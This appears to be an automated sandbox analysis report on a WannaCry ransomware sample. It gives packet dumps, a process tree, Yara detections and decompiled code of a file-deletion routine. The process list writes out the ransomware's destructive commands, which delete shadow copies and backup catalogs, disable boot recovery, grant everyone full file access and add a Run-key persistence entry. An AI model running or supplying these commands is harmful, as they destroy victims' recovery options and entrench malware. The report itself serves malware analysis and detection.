                                Jan 31, 2023 16:15:09.389929056 CET329OUTData Raw: 17 03 03 04 1c ea 4e 03 ef 72 2f e5 66 9a 7b 54 0c 32 4c 39 b1 12 b6 c4 80 9d 1b 67 a9 bb 65 95 8a 4e c5 f3 25 18 9a 59 ec af 77 e8 6a f3 88 7b 2b 24 42 78 38 9e b0 53 bd 1a 8b 24 6c 47 34 d9 98 d1 19 71 6d 4f c5 77 c5 c9 dc 83 6b 8c cc dc e9 a2
                                Data Ascii: Nr/f{T2L9geN%Ywj{+$Bx8S$lG4qmOwk/>n'^k-DaB{1oog>f?'z+\4#pe+[ajZ4+/vkxSpn{ZvtVJTA_DmRY8
                                Jan 31, 2023 16:15:09.391623020 CET355OUTData Raw: 17 03 03 02 1a ea 4e 03 ef 72 2f e5 67 4f 56 a5 6e 42 30 01 ae 33 da 4a b0 61 57 b9 0f 26 b9 31 55 23 33 49 1c 6d 42 2f 53 e5 c4 89 92 d1 d9 92 08 e3 73 19 cc 4a 2e 6c 37 c4 03 c6 31 9a ea 9c 1c e3 d4 0d cd 23 94 97 3a 17 22 a2 f6 9c 2b e3 a2 c1
                                Data Ascii: Nr/gOVnB03JaW&1U#3ImB/SsJ.l71#:"+c@fmnnGQaLf=>\8D z]Xx,RpTD%:1\YuxQ|8-@45fmGNVX;$ ffv
                                Jan 31, 2023 16:15:09.436930895 CET452OUTData Raw: 17 03 03 02 1a ea 4e 03 ef 72 2f e5 68 e7 fc 4b 3d 8f 83 f7 43 5a f2 a1 dd d5 1c 80 02 a2 22 22 f9 df c1 2f 7e a0 94 36 f0 31 bd 0b e4 5e b2 40 44 86 09 12 58 f7 2e 15 5c e5 93 24 de 1c 80 03 ba c5 0a 74 af 71 ff 38 31 52 b3 07 ab 82 a9 07 f3 08
                                Data Ascii: Nr/hK=CZ""/~61^@DX.\$tq81Rd^K9vlkC.=VXXDW$c[n9!> DZus}uB?)r"w+jO%5c^Ib[u8~zHtaQ00N8tA3
                                Jan 31, 2023 16:15:09.436932087 CET452OUTData Raw: 17 03 03 02 1a ea 4e 03 ef 72 2f e5 69 3e ca f8 f2 15 61 48 87 69 dd 2f 33 0f 5b b0 d5 17 8d b5 89 87 a8 46 04 cb 9e 96 49 b7 81 32 81 1e 23 04 14 00 e5 f8 2d e0 a4 a7 67 56 69 01 0d 3d f2 d8 d2 d2 67 cd 37 74 d1 ec 28 ec 13 9d f8 98 9c d4 d7 b3
                                Data Ascii: Nr/i>aHi/3[FI2#-gVi=g7t(ylt%Zo(s< 5=hHH{1oc((4q}ZIlO#6W1ed}>y1dr6SCB8G%;CeE9+lc(X:\ROw$Ts-


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:16:12:53
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\2N2jefqo8e.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\2N2jefqo8e.exe
                                Imagebase:0x400000
                                File size:3514368 bytes
                                MD5 hash:84C82835A5D21BBCF75A61706D8AB549
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000000.1583437170.000000000040E000.00000008.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.1955338620.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.2867204725.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:moderate

                                General

                                Target ID:3
                                Start time:16:12:55
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\attrib.exe
                                Wow64 process (32bit):true
                                Commandline:attrib +h .
                                Imagebase:0x9c0000
                                File size:19456 bytes
                                MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Target ID:4
                                Start time:16:12:55
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\icacls.exe
                                Wow64 process (32bit):true
                                Commandline:icacls . /grant Everyone:F /T /C /Q
                                Imagebase:0xea0000
                                File size:29696 bytes
                                MD5 hash:2E49585E4E08565F52090B144062F97E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Target ID:5
                                Start time:16:12:55
                                Start date:31/01/2023
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6e5c50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:6
                                Start time:16:12:55
                                Start date:31/01/2023
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6e5c50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:7
                                Start time:16:12:55
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskdl.exe
                                Wow64 process (32bit):true
                                Commandline:taskdl.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 89%, ReversingLabs
                                Reputation:moderate

                                General

                                Target ID:8
                                Start time:16:12:56
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c 140021675181576.bat
                                Imagebase:0x10000
                                File size:236544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:9
                                Start time:16:12:56
                                Start date:31/01/2023
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6e5c50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:10
                                Start time:16:12:56
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\cscript.exe
                                Wow64 process (32bit):true
                                Commandline:cscript.exe //nologo m.vbs
                                Imagebase:0x6c0000
                                File size:144896 bytes
                                MD5 hash:13783FF4A2B614D7FBD58F5EEBDEDEF6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:16
                                Start time:16:13:26
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskdl.exe
                                Wow64 process (32bit):true
                                Commandline:taskdl.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:18
                                Start time:16:13:56
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskdl.exe
                                Wow64 process (32bit):true
                                Commandline:taskdl.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:21
                                Start time:16:14:26
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskdl.exe
                                Wow64 process (32bit):true
                                Commandline:taskdl.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:24
                                Start time:16:14:56
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskdl.exe
                                Wow64 process (32bit):true
                                Commandline:taskdl.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:25
                                Start time:16:15:02
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Wow64 process (32bit):true
                                Commandline:@WanaDecryptor@.exe co
                                Imagebase:0x400000
                                File size:245760 bytes
                                MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000019.00000000.2870171547.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 96%, ReversingLabs

                                General

                                Target ID:27
                                Start time:16:15:02
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:cmd.exe /c start /b @WanaDecryptor@.exe vs
                                Imagebase:0x1000000
                                File size:236544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:28
                                Start time:16:15:02
                                Start date:31/01/2023
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6e5c50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:29
                                Start time:16:15:02
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Wow64 process (32bit):true
                                Commandline:@WanaDecryptor@.exe vs
                                Imagebase:0x400000
                                File size:245760 bytes
                                MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000001D.00000000.2872621577.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security

                                General

                                Target ID:30
                                Start time:16:15:04
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                Wow64 process (32bit):true
                                Commandline:TaskData\Tor\taskhsvc.exe
                                Imagebase:0x880000
                                File size:3098624 bytes
                                MD5 hash:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 0%, ReversingLabs

                                General

                                Target ID:31
                                Start time:16:15:05
                                Start date:31/01/2023
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6e5c50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:32
                                Start time:16:15:12
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                Imagebase:0x1000000
                                File size:236544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:33
                                Start time:16:15:12
                                Start date:31/01/2023
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6e5c50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:34
                                Start time:16:15:12
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                Wow64 process (32bit):true
                                Commandline:wmic shadowcopy delete
                                Imagebase:0xe10000
                                File size:393216 bytes
                                MD5 hash:82BB8430531876FBF5266E53460A393E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:37
                                Start time:16:15:26
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskse.exe
                                Wow64 process (32bit):true
                                Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 89%, ReversingLabs

                                General

                                Target ID:38
                                Start time:16:15:26
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Wow64 process (32bit):true
                                Commandline:@WanaDecryptor@.exe
                                Imagebase:0x400000
                                File size:245760 bytes
                                MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000026.00000000.3111499881.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security

                                General

                                Target ID:39
                                Start time:16:15:26
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                                Imagebase:0x1000000
                                File size:236544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:40
                                Start time:16:15:26
                                Start date:31/01/2023
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6e5c50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:41
                                Start time:16:15:26
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                                Imagebase:0x560000
                                File size:59392 bytes
                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:43
                                Start time:16:15:27
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskdl.exe
                                Wow64 process (32bit):true
                                Commandline:taskdl.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:45
                                Start time:16:15:56
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskse.exe
                                Wow64 process (32bit):true
                                Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:46
                                Start time:16:15:56
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Wow64 process (32bit):true
                                Commandline:@WanaDecryptor@.exe
                                Imagebase:0x400000
                                File size:245760 bytes
                                MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000002E.00000000.3418001639.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000002E.00000002.3419901230.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security

                                General

                                Target ID:47
                                Start time:16:15:57
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskdl.exe
                                Wow64 process (32bit):true
                                Commandline:taskdl.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:49
                                Start time:16:16:27
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskse.exe
                                Wow64 process (32bit):true
                                Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Target ID:50
                                Start time:16:16:27
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Wow64 process (32bit):true
                                Commandline:@WanaDecryptor@.exe
                                Imagebase:0x400000
                                File size:245760 bytes
                                MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000032.00000000.3719845976.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000032.00000002.3721585139.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:24.8%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:20.2%
                                  Total number of Nodes:94
                                  Total number of Limit Nodes:1
                                  execution_graph 315 401360 316 4013a7 315->316 320 401372 315->320 322 4018d0 free 316->322 318 4013b0 320->316 321 4018d0 free 320->321 321->320 322->318 212 4018f6 __set_app_type __p__fmode __p__commode 213 401965 212->213 214 401979 213->214 215 40196d __setusermatherr 213->215 224 401a66 _controlfp 214->224 215->214 217 40197e _initterm __getmainargs _initterm 218 4019d2 GetStartupInfoA 217->218 220 401a06 GetModuleHandleA 218->220 225 4012c0 GetLogicalDrives 220->225 224->217 226 4012e0 225->226 227 401305 GetDriveTypeW 226->227 228 401324 exit _XcptFilter 226->228 231 401080 226->231 227->226 255 401000 GetWindowsDirectoryW 231->255 233 4010d5 swprintf FindFirstFileW 234 40114a 233->234 241 401114 233->241 235 40114e swprintf ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 234->235 237 40119e 235->237 242 4011ae ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 237->242 268 4013d0 237->268 239 401140 Sleep 239->226 244 401136 241->244 261 401870 241->261 242->237 243 4011d9 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N FindNextFileW 243->235 245 401204 FindClose 243->245 267 4018d0 free 244->267 251 401215 245->251 246 40124a 247 401254 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 246->247 248 401265 246->248 247->247 247->248 249 40128f 248->249 250 40127e ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 248->250 297 4018d0 free 249->297 250->249 250->250 251->246 252 401239 DeleteFileW 251->252 252->251 254 401299 254->239 256 401022 GetTempPathW wcslen 255->256 257 40105e swprintf 255->257 258 401073 256->258 259 40103e wcslen 256->259 257->258 258->233 259->258 260 40104c wcslen 259->260 260->233 262 401885 261->262 263 40187a 261->263 264 4018bb 262->264 299 4018d0 free 262->299 263->262 298 4018d0 free 263->298 264->241 267->239 269 40152b 268->269 273 4013f2 ??2@YAPAXI 268->273 282 4015e7 269->282 283 40153e 269->283 270 401677 270->243 271 401574 274 40159e 271->274 280 401690 7 API calls 271->280 272 401616 278 401629 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II 272->278 279 401647 272->279 285 401440 273->285 286 401458 273->286 274->270 275 4015b3 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II 274->275 275->275 281 4015cd 275->281 276 401690 7 API calls 276->282 277 401690 7 API calls 277->283 278->278 278->279 279->270 287 40165c ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II 279->287 280->271 281->243 282->270 282->272 282->276 283->271 283->277 285->286 300 401690 285->300 290 401690 7 API calls 286->290 295 40147e 286->295 287->270 287->287 289 4014b5 291 4014d0 289->291 292 4014bf ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 289->292 290->286 314 4018d0 free 291->314 292->291 292->292 294 401690 7 API calls 294->295 295->289 295->294 296 4014d9 296->243 297->254 298->262 299->264 301 4016c0 300->301 307 4017c4 300->307 302 4016e8 301->302 306 40175b 301->306 303 4016f4 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 302->303 304 4016ee ?_Xran@std@ 302->304 309 401705 303->309 304->303 305 4017b5 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 305->307 306->305 310 401775 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 306->310 307->285 308 401740 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 308->285 309->308 312 401721 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 309->312 311 401786 310->311 311->285 312->308 313 401737 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 312->313 313->308 314->296 323 401a48 _exit 324 401a9b ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE

                                  Callgraph

                                  Executed Functions

                                  Function 00401080 Relevance: 19.7, APIs: 13, Instructions: 173fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 55%
                                  			E00401080(intOrPtr _a4) {
				void* _v4;
				char _v16;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				char _v560;
				struct _WIN32_FIND_DATAW _v632;
				long _v1124;
				long _v1644;
				long _v1648;
				char _v1656;
				char _v1660;
				void* _v1664;
				void* _v1668;
				char _v1672;
				char _v1676;
				void* _v1680;
				char _v1681;
				void* _v1684;
				char _v1688;
				intOrPtr _v1696;
				intOrPtr _v1700;
				intOrPtr _v1704;
				intOrPtr _v1708;
				void* _t54;
				int _t57;
				intOrPtr _t62;
				intOrPtr _t64;
				WCHAR* _t65;
				char _t72;
				intOrPtr _t84;
				void* _t100;
				intOrPtr _t101;
				intOrPtr _t103;
				int _t105;
				void* _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t112;
				intOrPtr _t113;
				intOrPtr _t115;
				void* _t118;

				_push(0xffffffff);
				_push(E00401AA7);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				_v1676 = _v1681;
				_v1672 = 0;
				_v1668 = 0;
				_v1664 = 0;
				_v4 = 0;
				_v1680 = 0;
				E00401000(_a4,  &_v1124);
				swprintf( &_v1644, 0x403040,  &_v1124, 0x403050);
				_t118 = _t115 - 0x688 + 0x18;
				_t54 = FindFirstFileW( &_v1644,  &(_v632.nFileSizeHigh)); // executed
				_t112 = _t54;
				if(_t112 != 0xffffffff) {
					_t72 = _v1681;
					do {
						swprintf( &_v1644, 0x403034,  &_v1124,  &_v560);
						_v1660 = _t72;
						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
						_t57 = wcslen( &_v1648);
						_t118 = _t118 + 0x14;
						_t105 = _t57;
						__imp__?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z(_t105, 1);
						if(_t57 != 0) {
							E00401330(_v1668,  &_v1656, _t105);
							_t118 = _t118 + 0xc;
							__imp__?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z(_t105);
						}
						_v16 = 1;
						E004013D0( &_v1688);
						_v28 = 0;
						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1, _v1680, 1,  &_v1672);
					} while (FindNextFileW(_t112,  &_v632) != 0);
					FindClose(_t112);
					_t100 = 0;
					_t106 = 0;
					while(1) {
						_t62 = _v1700;
						_t84 = _v1696;
						if(_t62 == 0 || _t100 >= _t84 - _t62 >> 4) {
							break;
						}
						_t65 =  *(_t106 + _t62 + 4);
						if(_t65 == 0) {
							_t65 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
						}
						if(DeleteFileW(_t65) != 0) {
							_v1708 = _v1708 + 1;
						}
						_t100 = _t100 + 1;
						_t106 = _t106 + 0x10;
					}
					_t101 = _t62;
					_t113 = _t84;
					_t107 = _t62;
					if(_t62 != _t84) {
						do {
							__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
							_t107 = _t107 + 0x10;
						} while (_t107 != _t113);
						_t62 = _v1704;
					}
					_v1696 = _t101;
					_v32 = 0xffffffff;
					_t108 = _t62;
					if(_t62 != _t101) {
						do {
							__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
							_t108 = _t108 + 0x10;
						} while (_t108 != _t101);
						_t62 = _v1704;
					}
					E004018D0(_t62, _t62);
					_t64 = _v1708;
				} else {
					_t103 = _v1668;
					_t110 = _v1672;
					_v4 = _t54;
					if(_t110 != _t103) {
						do {
							_t54 = E00401870(_t110, 0);
							_t110 = _t110 + 0x10;
						} while (_t110 != _t103);
						_t110 = _v1672;
					}
					E004018D0(_t54, _t110);
					_t64 = 0;
				}
				 *[fs:0x0] = _v40;
				return _t64;
			}














































                                  0x00401080
                                  0x00401082
                                  0x0040108d
                                  0x0040108e
                                  0x004010a5
                                  0x004010a9
                                  0x004010ad
                                  0x004010b1
                                  0x004010c5
                                  0x004010cc
                                  0x004010d0
                                  0x004010f5
                                  0x004010f7
                                  0x00401107
                                  0x0040110d
                                  0x00401112
                                  0x0040114a
                                  0x0040114e
                                  0x00401168
                                  0x00401171
                                  0x00401177
                                  0x00401182
                                  0x00401188
                                  0x0040118b
                                  0x00401194
                                  0x0040119c
                                  0x004011a9
                                  0x004011ae
                                  0x004011b6
                                  0x004011b6
                                  0x004011cc
                                  0x004011d4
                                  0x004011df
                                  0x004011e7
                                  0x004011fc
                                  0x00401205
                                  0x00401211
                                  0x00401213
                                  0x00401215
                                  0x00401215
                                  0x00401219
                                  0x0040121f
                                  0x00000000
                                  0x00000000
                                  0x0040122c
                                  0x00401232
                                  0x00401234
                                  0x00401234
